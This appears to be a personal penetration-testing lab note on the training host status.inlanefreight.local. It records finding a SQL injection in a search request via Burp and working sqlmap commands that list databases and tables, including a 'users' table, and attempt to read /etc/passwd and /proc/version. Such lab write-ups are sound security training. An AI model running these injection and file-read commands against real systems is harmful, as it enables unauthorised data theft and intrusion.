## `status.inlanefreight.local` - nothing here ![[images/Pasted image 20260628153106.png]] - hit search ![[images/Pasted image 20260628211142.png]] - `request:response` in burp ![[images/Pasted image 20260628211158.png]] - run `sqlmap` as this looks like a likely sqli ![[images/Pasted image 20260628211426.png]] - enum dbs and current user ```bash sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --dbs --current-db --is-dba --banner --batch ``` ![[images/Pasted image 20260629203050.png]] - `status` is a non-default db; let's enum its tables ![[images/Pasted image 20260629203205.png]] - `users` table ![[images/Pasted image 20260629203637.png]] - nothing in `company` table - unable to read `files` ```bash sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/passwd sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/proc/version ``` ![[images/Pasted image 20260629204112.png]]